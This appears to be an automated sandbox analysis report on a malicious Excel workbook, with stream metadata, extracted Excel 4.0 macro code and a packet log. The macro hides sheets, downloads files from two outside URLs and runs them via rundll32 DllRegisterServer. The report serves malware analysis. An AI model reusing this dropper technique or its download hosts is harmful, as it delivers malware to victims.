                                                                                                                                                                                                                  Contains Visio Document Stream:False
                                                                                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                                                                                  Flash Objects Count:
                                                                                                                                                                                                                  Contains VBA Macros:False

                                                                                                                                                                                                                  Summary

                                                                                                                                                                                                                  Code Page:1251
                                                                                                                                                                                                                  Author:van-van
                                                                                                                                                                                                                  Last Saved By:Grog
                                                                                                                                                                                                                  Create Time:2015-06-05 18:17:20
                                                                                                                                                                                                                  Last Saved Time:2021-05-21 08:07:02
                                                                                                                                                                                                                  Creating Application:Microsoft Excel
                                                                                                                                                                                                                  Security:0

                                                                                                                                                                                                                  Document Summary

                                                                                                                                                                                                                  Document Code Page:1251
                                                                                                                                                                                                                  Thumbnail Scaling Desired:False
                                                                                                                                                                                                                  Contains Dirty Links:False

                                                                                                                                                                                                                  Streams

                                                                                                                                                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                                  Entropy:0.298297266065
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c 1 . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 4 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . E x c e l 4 . 0 M a c r o s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b8 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 74 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 04 00 00 00
                                                                                                                                                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:\x5SummaryInformation
                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                  Stream Size:4096
                                                                                                                                                                                                                  Entropy:0.277521975637
                                                                                                                                                                                                                  Base64 Encoded:False
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v a n - v a n . . . . . . . . . G r o g . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . . . G . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                  Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 58 00 00 00 12 00 00 00 68 00 00 00 0c 00 00 00 80 00 00 00 0d 00 00 00 8c 00 00 00 13 00 00 00 98 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 08 00 00 00
                                                                                                                                                                                                                  Stream Path: Book, File Type: Applesoft BASIC program data, first line number 8, Stream Size: 521856
                                                                                                                                                                                                                  General
                                                                                                                                                                                                                  Stream Path:Book
                                                                                                                                                                                                                  File Type:Applesoft BASIC program data, first line number 8
                                                                                                                                                                                                                  Stream Size:521856
                                                                                                                                                                                                                  Entropy:2.01072652781
                                                                                                                                                                                                                  Base64 Encoded:True
                                                                                                                                                                                                                  Data ASCII:. . . . . . . . . T . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . G r o g B . . . . . . . . . . . . . . . . . . . . . . . D o c 4 . . . . . . . . . . . . . . . . . . _ x l f n . A G G R E G A T E . . . . . . . . . . . . . . . . . . . . _ x l f n . F . I N V . R T . . . . ! . . . . .
                                                                                                                                                                                                                  Data Raw:09 08 08 00 00 05 05 00 0a 54 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 04 47 72 6f 67 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                                                                                  Macro 4.0 Code

                                                                                                                                                                                                                  ,,,"=WORKBOOK.HIDE(""Doc2"",1)",,,,,,"=WORKBOOK.HIDE(""Doc3"",1)",,,,,,"=WORKBOOK.HIDE(""Doc4"",1)",,,=BA17(),,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL29&Doc2!BL30,Doc3!AY10)=RAND()=FACT(59)=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY13&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW10)=SUMXMY2(452354,45245)",,,,,,"=FORMULA(Doc2!BJ39&before.4.4.52.sheet!BD17&Doc2!BJ43&Doc3!AY10&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY11&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc3!AY12&Doc2!BJ41&Doc2!BJ45&Doc2!BJ42&Doc2!BJ41&Doc3!AY14&Doc2!BJ41&Doc2!BJ42&Doc2!BJ41&Doc2!BI24&""1""&Doc2!BJ41&Doc2!BJ45&Doc2!BJ45&Doc2!BJ44,Doc3!AW11)",,,,,,=GOTO(Doc3!AW8),,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW14)",,,,,,"=FORMULA(""=""&Doc2!BG29&Doc2!BG36&Doc2!BG37&Doc2!BG38&Doc2!BG39&""2 ""&Doc2!BI24&""1""&Doc2!BG41&Doc2!BG42&Doc2!BG43&Doc2!BG44&Doc2!BG33,Doc3!AW15)",,,,,,,,,,,,=BD4(),,,,,,,,,,,,,,,,,,,,,CALL,,,"=FORMULA(Doc2!BH20&Doc2!BI20&Doc2!BJ20&Doc2!BK20,Doc3!AY13)",,,,,,"=FORMULA(""U""&Doc2!BL28&Doc2!BL32&Doc2!BJ31&Doc2!BL31&Doc2!BL34&Doc2!BJ32&""e""&""A"",Doc3!AY11)",,,,,,,,,,,,"=FORMULA(Doc2!BH21&Doc2!BI21&Doc2!BJ21&Doc2!BK21,Doc3!AY14)",,,,,,,,,,,,"=FORMULA(Doc2!BM34&Doc2!BM29&Doc2!BM30&Doc2!BM33,Doc3!AY12)",,,,,,=BG8(),,,,,,
                                                                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,psq.com.mx/hDHqOp5,8UBQv/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ht,tps://,academy.haleemcampus.co,m/GxaCS5azoZlJ/filter.html,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\flamo.vir,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=,,,,,R,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,EXEC,,,0,,LM,JC,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,on,CB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\bubl.cmi,,,wnl,,oadT,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Fil,,LDo,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,""")",,,,,,B,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,o,J,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"(""r",,,,0,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,un,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,dll,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,3,,,=,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",Dl",,,"""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,lRegi,,,",",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,ster,,,"(""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,Server,,,),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,",0",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                                                                                                                                                                                                  ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,

                                                                                                                                                                                                                  Network Behavior

                                                                                                                                                                                                                  Network Port Distribution

                                                                                                                                                                                                                  TCP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jun 29, 2021 17:47:16.877285957 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.034804106 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.035001040 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.036274910 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.193631887 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.197438002 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.197491884 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.197526932 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.197642088 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.197695971 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.224020958 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.381622076 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.381784916 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.384398937 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:17.581867933 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216415882 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216470957 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216506958 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216523886 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216546059 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216559887 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216577053 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216587067 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216610909 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216625929 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216738939 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.216801882 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.220726967 CEST49734443192.168.2.4162.241.2.112
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.297157049 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.378248930 CEST44349734162.241.2.112192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.455751896 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.455862999 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.456981897 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.614711046 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615437031 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615483999 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615523100 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615549088 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615612030 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615669966 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.615679026 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.617918968 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.618040085 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.627181053 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.784462929 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.784598112 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.785315037 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:18.982614994 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.349277020 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.349569082 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.349670887 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.355262995 CEST49736443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.358287096 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.512012005 CEST44349736108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.520284891 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.520704031 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.521374941 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.683280945 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.683936119 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.684093952 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.684843063 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.689727068 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:19.851730108 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.255176067 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.255325079 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.255598068 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.255672932 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.256743908 CEST49738443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.258877993 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.418549061 CEST44349738108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.419622898 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.419821978 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.420542955 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.585305929 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.585884094 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.586049080 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.587156057 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.592771053 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:20.753871918 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.158571959 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.158694983 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.158785105 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.158839941 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.160494089 CEST49739443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.162003040 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.321614027 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.321721077 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.322243929 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.323024988 CEST44349739108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.479310989 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.479876041 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.479964972 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.481251001 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.486433983 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:21.643575907 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.044697046 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.044873953 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.045356035 CEST44349741108.179.232.80192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.045507908 CEST49741443192.168.2.4108.179.232.80
                                                                                                                                                                                                                  Jun 29, 2021 17:47:22.417372942 CEST49741443192.168.2.4108.179.232.80

                                                                                                                                                                                                                  UDP Packets

                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                  Jun 29, 2021 17:46:58.920005083 CEST4971453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:46:58.969975948 CEST53497148.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:00.087795973 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:00.137931108 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:02.795377016 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:02.841855049 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:03.633344889 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:03.683186054 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:04.540199041 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:04.594928026 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:05.699049950 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:05.749738932 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:10.623648882 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:10.678422928 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:12.290111065 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:12.344947100 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:12.721546888 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:12.802370071 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                                                                                  Jun 29, 2021 17:47:13.279201984 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                                                                                  Jun 29, 2021 17:47:13.352468967 CEST53529918.8.8.8192.168.2.4
